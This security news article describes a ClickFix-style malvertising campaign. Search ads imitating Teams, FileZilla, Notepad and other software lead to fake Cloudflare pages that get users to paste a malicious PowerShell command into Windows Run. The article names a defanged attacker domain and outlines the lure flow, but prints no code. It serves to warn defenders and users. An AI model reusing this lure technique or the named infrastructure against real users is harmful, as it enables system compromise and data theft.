Microsoft Teams, FileZilla, UltraViewer, and Notepad Used in Malvertising ‘Fix it’ Lures

• A novel malicious campaign that promises victims fixes for their software issues impersonates several popular brands, including Teams.
• Suspicious ads lead to decoy landing pages that redirect to fake Cloudflare verification pages.
• The page asks to click a "Fix It" button that copies a malicious PowerShell command, which the user is later instructed to paste in Windows Run.

Attackers were observed relying on clever yet deceptive techniques to evade detection and manipulate users into compromising their own systems in a malicious campaign based on social engineering. The campaign employs malvertising and decoy websites imitating software brands, followed by a fake Cloudflare notification.

Decoy landing pages imitating popular platforms and software, including Microsoft Teams, FileZilla, UltraViewer, CutePDF, and Advanced IP Scanner, used the same deceptive technique to manipulate users into executing malicious commands. Interestingly, researchers also encountered a lure targeting a cruise booking site, although the inclusion of this target remains unclear.

The campaign revealed itself during a Malwarebytes investigation triggered by a suspicious ad for “notepad” that appeared in search engine results. The lure was a seemingly legitimate website featuring a download button that only redirected to a deceptive Cloudflare verification page.  

Unlike traditional CAPTCHA-style bot deterrents, this page displays a message claiming the browser cannot properly render an offline document. It instructs users to click a "Fix It" button, which silently copies a malicious PowerShell command into their clipboard. Following further misleading instructions, users are asked to paste and execute the code via the Windows Run dialog box.

Once executed, the PowerShell script downloads additional files from a remote domain (topsportracing[.]com). A sandbox analysis revealed that the script immediately fingerprints the infected system, accessing key directories and running commands.

The extracted data is then transmitted to the attackers’ infrastructure through a Cloudflare tunnel, a common technique previously noted by Proofpoint for deploying remote access trojans (RATs). While the final payload wasn’t observed, it is likely to involve an infostealer or RAT.

This campaign is part of a growing number of social engineering schemes that utilize similar methods. Variants of this attack are sometimes referred to as ClearFake or ClickFix, and they share similarities with previously observed campaigns like SocGholish.